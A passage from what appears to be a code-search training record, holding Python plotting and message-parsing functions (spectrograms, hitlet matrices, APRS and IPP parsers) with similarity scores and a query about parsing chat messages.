str(start_year) + '.png', dpi=100)\n else:\n plt.draw()\n if mode != 'save':\n plt.show()", "def plot_example_spectrograms(example,rate):\r\n plt.figure()\r\n \r\n ###YOUR CODE HERE\r\n y_lim = 40\r\n plt.title('Spectrogram')\r\n bin_space = 512 #30*rate # A typical window size is 30 seconds\r\n plt.subplot(411)\r\n plt.specgram(examples[0]/np.sum(examples[0]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.title ('REM')\r\n plt.subplot(412)\r\n plt.title ('Stage 1 NREM')\r\n plt.specgram(examples[1]/np.sum(examples[1]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.subplot(413)\r\n plt.title ('Stage 2 NREM')\r\n plt.specgram(examples[2]/np.sum(examples[2]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.subplot(414)\r\n plt.title ('Stage 3/4 NREM')\r\n plt.specgram(examples[3]/np.sum(examples[3]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.show();\r\n \r\n return", "def plot_hitlet_matrix(self, hitlets, _hitlet_points=None):\n if not _hitlet_points:\n _hitlet_points = self.hitlets_to_hv_points(hitlets, )\n\n hitlet_matrix = self._plot_base_matrix(_hitlet_points).opts(title='Hitlet Matrix',\n xlabel='Time [ns]',\n ylabel='PMT channel',\n ylim=(1995, 2125),\n color='area',\n clabel='Area [pe]',\n cmap='viridis',\n colorbar=True\n )\n return hitlet_matrix", "def plot_event_display(self):\n # First we have to define the python callbacks:\n def matrix_callback(value):\n \"\"\"\n Callback for the dynamic hitlet matrix. Changes polygons when a new\n event is selected.\n \"\"\"\n self.hitlet_points = self.hitlets_to_hv_points(self.hitlets_per_event[value],\n t_ref=self.event_df.loc[value, 'time']\n )\n\n # Create the hitlet matrix and time stream:\n self.hitlet_matrix = self.plot_hitlet_matrix(hitlets=None,\n _hitlet_points=self.hitlet_points)\n return self.hitlet_matrix\n\n def pattern_callback(value, x_range):\n \"\"\"\n Call back for the dynamic PMT pattern map. Depends on the selcted\n event as well as the selected x_range in the hitlet_matrix.\n \"\"\"\n # Get hitlet points and select only points within x_range:\n hit = self.hitlet_points.data\n if not x_range:\n time = hit['time'].values\n length = hit['length'].values\n dt = hit['dt'].values\n x_range = [min(time), max(time + (length * dt))]\n\n m = (hit['time'] >= x_range[0]) & (hit['time'] < x_range[1])\n\n hitlets_in_time = hit[m]\n new_points = self.hv.Points(hitlets_in_time)\n\n # Plot pmt pattern:\n pmts = self.plot_nveto(hitlets=None,\n _hitlet_points=new_points,\n pmt_size=8,\n pmt_distance=0.5)\n angle = self._plot_reconstructed_position(value)\n return angle * pmts\n\n self._make_sliders_and_tables(self.event_df)\n index = self.evt_sel_slid.value\n self.hitlet_points = self.hitlets_to_hv_points(self.hitlets_per_event[index],\n t_ref=self.event_df.loc[index, 'time'])\n\n dmap_hitlet_matrix = self.hv.DynamicMap(\n matrix_callback,\n streams=[self.evt_sel_slid.param.value]).opts(framewise=True)\n\n time_stream = self.hv.streams.RangeX(source=dmap_hitlet_matrix)\n\n dmap_pmts = self.hv.DynamicMap(\n pattern_callback,\n streams=[self.evt_sel_slid.param.value, time_stream])\n\n slider_column = pn.Column(self.evt_sel_slid,\n self.evt_sel_slid.controls(['value']),\n self.time_table)\n\n event_display = pn.Column(self.title_panel,\n pn.Row(slider_column, dmap_pmts, width_policy='max'),\n dmap_hitlet_matrix,\n self.prop_table,\n self.pos_table,\n width_policy='max')\n return event_display", "def visualise_hourly_arrivals_at_each_lab(tests_dataframe):\r\n labs_df = create_dataframe_from_csv('labs.csv')\r\n labs_df = drop_missing_values_in_dataframe(labs_df)\r\n list_of_labs = labs_df['lab_name'].to_list()\r\n for lab_name in list_of_labs:\r\n df = tests_dataframe.loc[tests_dataframe['lab_name'] == lab_name]\r\n df.time_test_arrives_lab = pd.to_datetime(df.time_test_arrives_lab)\r\n df = df.sort_values(by=\"time_test_arrives_lab\")\r\n df = df[['time_test_arrives_lab']]\r\n df = df.reset_index().set_index('time_test_arrives_lab')\r\n df = df.resample('H').count()\r\n df.plot(title = 'hourly arrivals at ' + lab_name)\r\n plt.show()", "def plotSpectrum(y,Fs):\n n = len(y) # length of the signal\n k = arange(n)\n T = n/Fs\n frq = k/T # two sides frequency range\n frq = frq[range(n/2)] # one side frequency range\n\n Y = fft(y)/n # fft computing and normalization\n Y = Y[range(n/2)]\n \n plt.plot(frq,abs(Y),'r') # plotting the spectrum\n xlabel('Freq (Hz)')\n ylabel('|Y(freq)|')", "def plot_weights_timeseries(weights, phases, output_file=None):\n\n n_components = weights.shape[1]\n\n fig, ax = plt.subplots(nrows=n_components, figsize=(9, 4 * n_components),\n sharex=True, squeeze=False)\n\n for i in range(n_components):\n ax[i, 0].plot(weights[:, i], '-')\n ax[i, 0].plot(phases, '-', color='gray', alpha=0.7)\n\n ax[i, 0].set_ylabel(r'$\\gamma_{:d}$'.format(i + 1))\n\n ax[i, 0].grid(ls='--', color='gray', alpha=0.5)\n\n if i == n_components - 1:\n ax[i, 0].set_xlabel('Time')\n\n if output_file is not None and output_file:\n plt.savefig(output_file, bbox_inches='tight')\n\n plt.show()", "def display_time_stats(self):\n\n self.time_frame = stat_display_labels(\n self.stats_frame,\n \"Time Stats\",\n [\n \"The busiest month was:\",\n \"The busiest day of the week was:\",\n \"The busiest start hour was:\",\n ],\n row=0,\n columnspan=2,\n )\n self.time_stats_data = tk.Label(self.time_frame, justify=\"left\")\n self.time_stats_data.grid(row=0, column=2)", "def plot_tcv(self):\n self.plot_profiles(0, title='Shot #{:d} @ t={:.2f} s'.format(self.shot, self.t))", "def vlook(model):\n plt.close()\n plt.plot(model.rec_t, np.array(model.data[\"soma\"][0]))\n plt.xlabel(\"Time (ms)\")\n plt.ylabel(\"Volgate (mV)\")\n plt.show()\n return len(model.rec_t)", "def plot_data_stats(data_dict, data_bxtxn, data_dt):\n print(onp.mean(onp.sum(data_bxtxn, axis=1)), \"spikes/second\")\n f = plt.figure(figsize=(12,4))\n plt.subplot(141)\n plt.hist(onp.mean(data_bxtxn, axis=1).ravel()/data_dt);\n plt.xlabel('spikes / sec')\n plt.subplot(142)\n plt.imshow(data_dict['hiddens'][0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('Sample trial rates')\n plt.subplot(143);\n plt.imshow(data_bxtxn[0,:,:].T)\n plt.xlabel('time')\n plt.ylabel('neuron #')\n plt.title('spikes')\n plt.subplot(144)\n plt.stem(onp.mean(onp.sum(data_bxtxn, axis=1), axis=0));\n plt.xlabel('neuron #')\n plt.ylabel('spikes / sec');\n return f", "def plot_stability_matrix(self, file_name=None):\n size = len(self.seq) / 2.5\n plt.figure(figsize=(size, 2.5))\n plt.imshow(self.matrix,\n interpolation='none',\n cmap=plt.get_cmap('YlOrRd'))\n plt.yticks(range(4), ['A', 'C', 'G', 'U'], fontsize=12)\n plt.xticks(range(len(self.seq)), fontsize=12)\n if file_name is None:\n plt.show()\n else:\n plt.savefig(file_name,\n bbox_inches='tight',\n transparent=True,\n pad_inches=0)\n plt.close()", "def visualize_days():\n\n # grab our parsed data that we parsed earlier\n data_file = parse(MY_FILE, \",\")\n\n counter = Counter(item['DayOfWeek'] for item in data_file)\n\n data_list = [\n counter['Monday'],\n counter['Tuesday'],\n counter['Wednesday'],\n counter['Thursday'],\n counter['Friday'],\n counter['Saturday'],\n counter['Sunday']\n ]\n\n day_tuple = tuple(['Mon','Tues','Wed','Thurs','Fri','Sat','Sun'])\n\n plt.plot(data_list)\n\n # num of ticks needed for our x-axis & assign labels\n plt.xticks(range(len(day_tuple)),day_tuple)\n \n plt.savefig(\"Days.png\")\n plt.clf()", "def showPlot2():\n interested_in = list(range(1,10))\n proc_sim_data = []\n for item in interested_in:\n len_sim_data = []\n raw_sim_data = runSimulation(item, 1.0, 25, 25, 0.75, 100, Robot, False)\n for mes in raw_sim_data:\n len_sim_data.append(len(mes))\n proc_sim_data.append(sum(len_sim_data)/len(len_sim_data))\n plot(interested_in, proc_sim_data)\n title('Dependence of cleaning time on number of robots')\n xlabel('number of robots (tiles)')\n ylabel('mean time (clocks)')\n show()", "def plot_features(data: np.array)->None:\n n_rows = np.size(data, 0)\n n_cols = np.size(data, 1)\n for i in range(n_cols):\n plt.hist(data[:,i])\n plt.show()", "def plot_example_spectrograms(example,rate):\r\n plt.figure()\r\n \r\n labels = ['REM', 'NREM 1', 'NREM 2', 'NREM 3-4']\r\n \r\n ###YOUR CODE HERE\r\n for i in xrange(0,4):\r\n plt.subplot(2,2,i+1)\r\n plt.specgram(example[i], NFFT=256, Fs=rate, label=labels[i])\r\n plt.ylim( ymax = 30 )\r\n plt.legend()\r\n plt.show()\r\n \r\n return", "def showPlot1():\n\n interested_in = list(range(5,30,5))\n proc_sim_data = []\n for item in interested_in:\n len_sim_data = []\n raw_sim_data = runSimulation(1, 1.0, item, item, 0.75, 100, Robot, False)\n for mes in raw_sim_data:\n len_sim_data.append(len(mes))\n proc_sim_data.append(sum(len_sim_data)/len(len_sim_data))\n plot(interested_in, proc_sim_data)\n title('Dependence of cleaning time on room size')\n xlabel('area of the room (tiles)')\n ylabel('mean time (clocks)')\n show()", "def visualize_days():\n\t\n\t#grab our parsed data that we parsed earlier\n\tdata_file = parse(MY_FILE, \",\")\n\t\n\t#make a new variable, counter, from iterating through each line of\n\t#data in the parsed data, and count how many incidents happen on each\n\t#day of the week\n\tcounter = Counter(item[\"DayOfWeek\"] for item in data_file)\n\t\n\t#separate the x-axis data (days of the week) from the counter variable\n\t#from the y-axis (number of incidents each day)\n\tdata_list = [\n\t\t\t\tcounter[\"Monday\"],\n\t\t\t\tcounter[\"Tuesday\"],\n\t\t\t\tcounter[\"Wednesday\"],\n\t\t\t\tcounter[\"Thursday\"],\n\t\t\t\tcounter[\"Friday\"],\n\t\t\t\tcounter[\"Saturday\"],\n\t\t\t\tcounter[\"Sunday\"]\n\t\t\t\t]\n\tday_tuple = tuple([\"Mon\", \"Tues\", \"Wed\", \"Thurs\", \"Fri\", \"Sat\", \"Sun\"])\n\t\n\t#with y-axis data, assign it to a matplotlib plot instance\n\tplt.plot(data_list)\n\t\n\t#create amount of ticks need for x and y axes and assign labels\n\tplt.xticks(range(len(day_tuple)), day_tuple)\n\t\n\t#save the plot\n\tplt.savefig(\"Days.png\")\n\t\n\t#close plot file\n\tplt.clf()", "def showConfusionMatrix(self): \r\n sn.heatmap(self.conf_matrix, annot=True)\r\n plt.plot( label=\"Accuracy\")\r\n plt.plot( label=\"Error\")\r\n plt.figtext(0,0,'Accuracy: {}\\nError: {}\\nRecall: {}\\nPrecision: {}'.format(self.accuracy,\r\n self.error,\r\n self.recall,\r\n self.precision))\r\n plt.title('Confusion Matrix')\r\n plt.show()\r\n return None", "def show():\n plt.show()", "def show():\n plt.show()", "def show():\n plt.show()", "def visualize(self):\n print('{0} is {1} time steps old'.format(self.name, self.timestep))\n\n self.amygdala.visualize(self.timestep, self.name, self.log_dir)\n self.cerebellum.visualize(self.name, self.log_dir)\n self.cingulate.visualize(self.name, self.log_dir)\n self.hippocampus.visualize(self.name, self.log_dir)\n #self.ganglia.visualize(self.name, self.log_dir)\n #self.cortex.visualize(self.name, self.log_dir)", "def grid_plot_twitter(proverbs_list, data,dim = (4,4), ylog = False, rt = False): \n plt.rcParams.update({\n 'font.size': 9,\n 'axes.titlesize': 8,\n 'axes.labelsize': 14,\n 'xtick.labelsize': 7,\n 'ytick.labelsize': 7,\n 'legend.fontsize': 10,\n })\n \n rows, cols = dim[0],dim[1]\n fig = plt.figure(figsize=(12, 5.75))\n gs = gridspec.GridSpec(ncols=cols, nrows=rows)\n gs.update(wspace = 0.2, hspace = 0.2)\n \n \n i = 0\n \n fig.text(0.5, 0.02,'Year' , ha='center', fontsize = 14)\n fig.text(0.02, 0.5, 'Frequency among all {}-grams on Twitter'.format(len(proverbs_list[0].split())), va='center', rotation='vertical', fontsize = 14)\n \n #loop to create each timeseries plot in the grid\n for r in np.arange(0, rows, step=1):\n for c in np.arange(cols):\n\n ax = fig.add_subplot(gs[r, c])\n\n ax.text(0.1,0.9,'\\\"{}\\\"'.format(proverbs_list[i]),horizontalalignment='left', transform=ax.transAxes)\n ts = data[data.proverb ==proverbs_list[i]]\n ts.date = pd.to_datetime(ts.date, format = '%Y-%m-%d', errors='coerce')\n ts.index = ts.date\n ts = ts.sort_index()\n print(ts)\n ts2 = ts.copy()[['freq_noRT', 'freq']]\n print(ts2)\n ts2 = ts2.rolling(window=30).mean()\n print(ts2)\n\n \n if ylog == False:\n pass\n\n elif ylog == True:\n ax.set_yscale('log') \n\n if rt == False:\n ax.plot(ts.index, ts['freq_noRT'], alpha = 0.5, color = 'gray')\n ax.plot(ts2.index, ts2['freq_noRT'], alpha = 0.9, color='darkorange') \n \n elif rt ==True:\n ax.plot(ts.index, ts['freq'], alpha = 0.5, color = 'gray')\n ax.plot(ts2.index, ts2['freq'], alpha = 0.9, color='darkorange')\n i+=1\n \n plt.subplots_adjust(left=0.08, right=0.95, top=0.95, bottom=0.1)", "def plot_dt_signal(x, title=None):\n pylab.figure()\n pylab.stem(range(len(x)), x)\n pylab.title(title)\n pylab.xlabel(\"samples\")", "def show_plot() :\n logger.info(\"Show plot\")\n pylab.axis('equal')\n pylab.xlabel(\"Longitud\")\n pylab.ylabel(\"Latitud\")\n pylab.grid(True)\n pylab.title(\"Product tiles and product source\")\n pylab.show()" ]
[ "0.6815102", "0.6405556", "0.6397176", "0.6318654", "0.62567717", "0.62256616", "0.6137152", "0.6075933", "0.603835", "0.60201347", "0.6009235", "0.6006938", "0.5997316", "0.5959236", "0.5952973", "0.5915869", "0.58863264", "0.58826864", "0.5851976", "0.5786718", "0.57783747", "0.57757807", "0.57463545", "0.57421666", "0.57226545", "0.5698058", "0.5697018", "0.5687832", "0.5667979", "0.5644963", "0.56444865", "0.5642347", "0.56419194", "0.56382984", "0.5622541", "0.561776", "0.55808985", "0.558039", "0.55755156", "0.5573985", "0.5572348", "0.55588806", "0.5551681", "0.5514831", "0.55134183", "0.5506285", "0.5505552", "0.5503652", "0.54820687", "0.547955", "0.5477201", "0.54642844", "0.54614335", "0.5459864", "0.5459082", "0.54577315", "0.54565775", "0.54500705", "0.5449431", "0.54426193", "0.5442435", "0.5438719", "0.5429751", "0.54220414", "0.54160863", "0.5404296", "0.5401275", "0.5397828", "0.538191", "0.53779405", "0.5369311", "0.53664505", "0.53628343", "0.5360514", "0.5359291", "0.5355937", "0.53461194", "0.5343525", "0.5342654", "0.5342305", "0.53392833", "0.5335844", "0.5334315", "0.5324168", "0.5318254", "0.53155136", "0.53068537", "0.5304198", "0.52989787", "0.52948034", "0.5293946", "0.528375", "0.5279512", "0.52765024", "0.52765024", "0.52765024", "0.5273928", "0.5263224", "0.5262658", "0.5261213" ]
0.6246299
5
return nothing but store data in self.parse_msg and self.parse_type
def parse(self, message, prefix, cmd_list): self.parse_type = "" self.parse_msg = [] for i in message: if i[0].isdigit(): self.parse_number(i, "w") elif len(i) == 1: self.parse_type += "w" self.parse_msg.append(i) elif i == "@everyone" or i == "@here": self.parse_type += "s" self.parse_msg.append(i) elif i[0] == prefix: self.parse_command(i, cmd_list) elif i[0] == "-": self.parse_number(i, "o") elif i[0] == "<" and len(i) > 3: self.parse_mention(i) else: self.parse_type += "w" self.parse_msg.append(i[(i[0] == "\\"):])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse(self, data):\n raise NotImplementedError", "def parse(cls, data):\n raise NotImplementedError", "def _parse(self):\n pass", "def parse_data(self):\n\t\traise NotImplementedError('%s: No parse function implemented!' % self.name)", "def parse(self, message: Message):\n\t\tpass", "def parse(self):\n pass", "def parse(self):\n pass", "def parse(self):\n pass", "def parse(self):\n pass", "def parse(self):", "def parseMsg(self):\n # These 4 elements are always present\n # \"ToUserName\"\n # \"FromUserName\"\n # \"CreateTime\"\n # \"MsgType\"\n\n # Following elements depends on MsgType\n # \"MsgId\"\n # \"Content\"\n # \"MediaId\"\n # \"PicUrl\"\n # \"Format\"\n # \"ThumbMediaId\"\n # \"Location_X\"\n # \"Location_Y\"\n # \"Scale\"\n # \"Label\"\n # \"Title\"\n # \"Description\"\n # \"Url\"\n # \"Event\"\n # \"EventKey\"\n # \"Ticket\"\n # \"Latitude\"\n # \"Longitude\"\n # \"Precision\"\n # \"Recognition\"\n\n def getField(req, key):\n if req.find(key) != None:\n return req.find(key).text\n\n\n msg = {}\n req = et.fromstring(self.request.body.decode(\"utf-8\"))\n\n # These 4 elements are always present\n msg[\"ToUserName\"] = getField(req, \"ToUserName\")\n msg[\"FromUserName\"] = getField(req, \"FromUserName\")\n msg[\"CreateTime\"] = getField(req, \"CreateTime\")\n msg[\"MsgType\"] = getField(req, \"MsgType\")\n\n # Following elements depends on MsgType\n msg[\"MsgId\"] = getField(req, \"MsgId\")\n msg[\"Content\"] = getField(req, \"Content\")\n msg[\"MediaId\"] = getField(req, \"MediaId\")\n msg[\"PicUrl\"] = getField(req, \"PicUrl\")\n msg[\"Format\"] = getField(req, \"Format\")\n msg[\"ThumbMediaId\"] = getField(req, \"ThumbMediaId\")\n msg[\"Location_X\"] = getField(req, \"Location_X\")\n msg[\"Location_Y\"] = getField(req, \"Location_Y\")\n msg[\"Scale\"] = getField(req, \"Scale\")\n msg[\"Label\"] = getField(req, \"Label\")\n msg[\"Title\"] = getField(req, \"Title\")\n msg[\"Description\"] = getField(req, \"Description\")\n msg[\"Url\"] = getField(req, \"Url\")\n msg[\"Event\"] = getField(req, \"Event\")\n msg[\"EventKey\"] = getField(req, \"EventKey\")\n msg[\"Ticket\"] = getField(req, \"Ticket\")\n msg[\"Latitude\"] = getField(req, \"Latitude\")\n msg[\"Longitude\"] = getField(req, \"Longitude\")\n msg[\"Precision\"] = getField(req, \"Precision\")\n msg[\"Recognition\"] = getField(req, \"Recognition\")\n return msg", "def parse(self):\n raise NotImplementedError", "def parse(self, data: Any) -> Any:\n if self._parse:\n return self._parse(data)\n else:\n return data", "def parse_message(self, message):\n pass", "def parse(self) -> None:\n pass", "def _parse(self) -> bool:\n\n # First, check if this packet has a '!' at an offset position\n # This is allowed as per APRS 1.01 C5 P18\n if hasattr(self, '_offset'):\n # Packets with the '!' offset do not have a timestamp or messaging capabilities\n # Chop everything off the info field before the '!'\n self._info = self._info[self._offset:]\n\n elif self.data_type_id == '!':\n # Packet has no timestamp, station has no messaging capability\n self.timestamp = None\n self.messaging = False\n\n elif self.data_type_id == '/':\n # Packet has timestamp, station has no messaging capability\n self.messaging = False\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n elif self.data_type_id == '=':\n # Packet has no timestamp, station has messaging capability\n self.timestamp = None\n self.messaging = True\n\n elif self.data_type_id == '@':\n # Packet has timestamp, station has messaging capability\n self.messaging = True\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n else:\n # This isn't a position packet\n raise ParseError(\"Unknown position data type: {}\".format(self.data_type_id))\n\n if self.timestamp is None:\n data = self._info\n else:\n data = self._info[7:]\n\n # Check to see if the position data is compressed or uncompressed\n if re.match(r'[0-9\\s]{4}\\.[0-9\\s]{2}[NS].[0-9\\s]{5}\\.[0-9\\s]{2}[EW]', data):\n # Parse the uncompressed position values from the information field\n (self.latitude, self.longitude, self.ambiguity, self.symbol_table, self.symbol_id\n ) = self._parse_uncompressed_position(data)\n\n # Ensure compressed is set to False\n self.compressed = False\n\n if len(data) > 19:\n # This packet has additional data in the information field, so attempt to parse it\n (phg, radio_range, dfs, self.course, self.speed, self.altitude,\n comment) = self._parse_data(data[19:])\n\n if self.symbol_table == \"/\" and self.symbol_id == \"\\\\\":\n # If the symbol table is /, and the symbol ID is \\, it implies a DF report\n # 26th and 30th characters should be /\n logger.debug(\"Symbol table and symbol indicates a DF report\")\n\n if len(comment) < 8:\n # Packets with DF information must be at least 8 characters long\n raise ParseError(\"Missing DF values\")\n\n if comment[0] != \"/\" or comment[4] != \"/\":\n # Packets with DF information must also include the bearing and NRQ values\n # See APRS 1.01 C7 P30\n raise ParseError(\n \"Invalid DF values (character in position 0 and 4 should be '/'\"\n )\n\n # Extract the bearing\n self.bearing = int(comment[1:4])\n logger.debug(f\"DF bearing is {self.bearing} degrees\")\n\n # Decode the NRQ value\n (self.number, self.df_range, self.quality) = APRSUtils.decode_nrq(comment[5:8])\n\n # Strip the bearing/NRQ value from the comment\n self.comment = comment[8:]\n\n elif self.symbol_table in [\"/\", \"\\\\\"] and self.symbol_id == \"_\":\n # / or \\, and _ for the symbol table and symbol implies a weather report\n # TODO - Implementation\n logger.debug(\"Symbol table and symbol indicates a weather report\")\n\n elif phg:\n # Decode the power, height, gain and directivity values\n (self.power, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_phg(phg)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif radio_range:\n # The radio range is specified as 4 digits, which denote the range in miles\n self.radio_range = int(radio_range)\n logger.debug(f\"Radio range is {radio_range} miles\")\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif dfs:\n # Decode the signal strength, height, gain and directivity values\n (self.strength, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_dfs(dfs)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n else:\n # No additional data found\n self.comment = comment\n\n else:\n # Parse the compressed position values from the information field\n\n # Get the compressed position\n compressed_position = data[0:13]\n\n try:\n (self.latitude, self.longitude, self.altitude, self.course, self.speed,\n self.radio_range, self.compression_fix, self.compression_source,\n self.compression_origin) = self._parse_compressed_position(compressed_position)\n\n except Exception as e:\n # TODO Catch specific errors (for example, OverflowError)\n raise ParseError(\"Couldn't parse compressed position: {}\".format(e))\n\n # Ensure compressed is set to True\n self.compressed = True\n\n # Parse the symbol table and symbol ID\n self.symbol_table = data[0]\n self.symbol_id = data[9]\n\n # TODO - parse altitude information\n\n self.comment = data[13:]\n logger.debug(\"Comment is {}\".format(self.comment))\n\n # If we get this far, then we've parsed the packet\n return True", "def parse(self, input_data, reason):\n raise NotImplementedError()", "def parse_string(self, data):\n pass", "def parse_replaydata(self):\n pass", "def parse(self, input):\n pass", "def _parse_msg(self, msg):\n try:\n self.received_msg += msg.decode()\n except:\n self.log.warning(\"invalid parse frame '%s'\" % msg)\n\n while True:\n pos = self.received_msg.find('\\r')\n if pos == -1: # no full msg\n break\n m = self.received_msg[:pos].strip()\n if not len(m):\n break\n self.platform.process_received_message(m)\n self.received_msg = self.received_msg[pos + 1:]", "def _parse_message(self, data):\n try:\n _, values = data.split(':')\n self.serial_number, self.value = values.split(',')\n self.value = int(self.value, 16)\n\n is_bit_set = lambda b: self.value & (1 << (b - 1)) > 0\n\n # Bit 1 = unknown\n self.battery = is_bit_set(2)\n self.supervision = is_bit_set(3)\n # Bit 4 = unknown\n self.loop[2] = is_bit_set(5)\n self.loop[1] = is_bit_set(6)\n self.loop[3] = is_bit_set(7)\n self.loop[0] = is_bit_set(8)\n\n except ValueError:\n raise InvalidMessageError('Received invalid message: {0}'.format(data))", "def parse(self):\n\t\tsub = self.body.split(' ')\n\t\tif len(sub) == 3:\n\t\t\tself.latitude = float(sub[1])\n\t\t\tself.longitude = float(sub[2])\n\t\telse:\n\t\t\tself.latitude = None\n\t\t\tself.longitude = None\n\t\t\traise Exception(\"Invalid message\")", "def parse(self, content):\n pass", "def parse_mess_ASCII(self, mess):\n # Decode message - possibly not necessary if we are doing this in the receiving stage\n mess_str = mess.decode(self.encoding)\n\n # Extract individual data-points into list\n mess_list = mess_str.split(' ')\n\n mess_type = mess_list[0]\n\n # Maybe do more with this function, or perhaps just do these basics, and let further processing be done once the response type is known\n return mess_type, mess_list", "def parse(self) :\n self._curname = None\n self._curattributes = None\n \n self.setVersion((ord(self._data[0]), ord(self._data[1])))\n self.setOperationId(unpack(\">H\", self._data[2:4])[0])\n self.setRequestId(unpack(\">I\", self._data[4:8])[0])\n self.position = 8\n endofattributes = self.tagvalues[\"end-of-attributes-tag\"]\n maxdelimiter = self.tagvalues[\"event_notification-attributes-tag\"]\n nulloffset = lambda : 0\n #try :\n if 1:\n tag = ord(self._data[self.position])\n while tag != endofattributes :\n self.position += 1\n name = self.tags[tag]\n if name is not None :\n func = getattr(self, name.replace(\"-\", \"_\"), nulloffset)\n self.position += func()\n if ord(self._data[self.position]) > maxdelimiter :\n self.position -= 1\n continue\n oldtag = tag\n tag = ord(self._data[self.position])\n if tag == oldtag :\n self._curattributes.append([])\n #except IndexError :\n # raise IPPError, \"Unexpected end of IPP message.\"\n \n self.data = self._data[self.position+1:]\n self.parsed = True", "def _unserialize_body(self, data, struct, persistent_end):\n initialized = False\n while len(data) >= 0:\n try:\n # ParseFromString will ignore all data after it\n # has finished parsing a message from the start\n # of the data. By default `message + garbage`\n # will parse `message` perfectly fine.\n # This becomes a problem when `garbage` contains\n # another message.\n struct.ParseFromString(data)\n initialized = struct.IsInitialized()\n if initialized or len(data) == 0:\n break\n except google.protobuf.message.DecodeError, e:\n pass\n if not persistent_end:\n break\n data = data[:-1]\n return initialized, struct, len(struct.SerializePartialToString())", "def _process_msg(cls, msg):\n raise NotImplementedError", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def _build_parsed_values(self):\n\n self.final_result = []\n retrieved_data_types = set() # keep track of data type ID's unpacked from record\n\n # Get the file time from the file name\n if self._file_time:\n self.final_result.append(self._encode_value(\n AdcptMWVSParticleKey.FILE_TIME, self._file_time, str))\n else:\n self.final_result.append({DataParticleKey.VALUE_ID: AdcptMWVSParticleKey.FILE_TIME,\n DataParticleKey.VALUE: None})\n\n # Get the sequence number from the file name\n if self._sequence_number:\n self.final_result.append(self._encode_value(\n AdcptMWVSParticleKey.SEQUENCE_NUMBER, self._sequence_number, int))\n else:\n self.final_result.append({DataParticleKey.VALUE_ID: AdcptMWVSParticleKey.SEQUENCE_NUMBER,\n DataParticleKey.VALUE: None})\n\n # Get the number of data types from the Header\n num_data_types = struct.unpack_from('<B', self.raw_data, HEADER_NUM_DATA_TYPES_OFFSET)\n # Get the list of offsets from the Header\n offsets = struct.unpack_from('<%sI' % num_data_types, self.raw_data, HEADER_OFFSETS_OFFSET)\n\n # Unpack Type IDs from the offsets\n for offset in offsets:\n data_type_id, = struct.unpack_from('<h', self.raw_data, offset)\n # keep track of retrieved data types\n retrieved_data_types.add(data_type_id)\n\n # Feed the data through the corresponding encoding function and unpacking rules\n try:\n self.encoding_func_dict[data_type_id][ENCODE_FUNC](\n offset + ID_TYPE_SIZE, self.encoding_func_dict[data_type_id][UNPACK_RULES])\n except KeyError:\n log.debug(\"Skipping unsupported data type ID: %s at offset: %s\",\n data_type_id, offset)\n\n # go through the list of expected data type ID's, fill in None for missing data type ID's\n missing_data = EXPECTED_PARTICLE_IDS_SET.difference(retrieved_data_types)\n for data_type_id in missing_data:\n if data_type_id is VARIABLE_LEADER:\n # timestamp is essential for a data particle - no timestamp, no particle\n message = \"Variable Leader Data Type is required for internal timestamp, \" \\\n \"particle ignored.\"\n log.warn(message)\n raise RecoverableSampleException(message)\n\n self.final_result.extend(self.encoding_func_dict[data_type_id][ENCODE_NULL])\n\n log.trace(\"FINAL RESULT: %s\\n\", self.final_result)\n\n return self.final_result", "def parse_message(msg):\n # the message number, increments with each message\n msg_number = msg[0][0]\n # the message type\n msg_type = msg[0][1][0]\n return {\n 'noop': parse_noop_message,\n 'c': parse_content_message,\n }[msg_type](msg, msg_number)", "def process_data(self, data):\n return data", "def _parse_message(self, string, protocol):\n #print(\"Parsing message: %s\" % string)\n msg = parse_message_string(string)\n result = MessageResult(original_message=msg)\n\n if isinstance(msg, MethodCallMessage):\n # Handle method call\n res = self._method_call(msg)\n response_msg = ResponseMessage(result_code=0, result=res, response_to=msg.id)\n result.response = create_message_string(response_msg)\n elif isinstance(msg, SubscribeMessage):\n # Handle subscription to event\n response_msg = ResponseMessage(result_code=0, result=None, response_to=msg.id)\n result.response = create_message_string(response_msg)\n else:\n raise MessageHandleError(MessageHandleError.RESULT_UNEXPECTED_MESSAGE, msg)\n\n return result", "def decode(self) -> None:\n self.msg_type = AISType(self.nmea.ais_id)\n self.content = decode(self.nmea)", "def parse_response(self):\n pass", "def process(self) -> None:\n self.parsed = email.message_from_bytes(self.rawmailcontent, policy=email.policy.EmailPolicy()) # type: email.message.EmailMessage\n\n self.subject = self.parsed[\"subject\"]\n\n if self.parsed[\"X-Jicket-Initial-ReplyID\"] is not None and 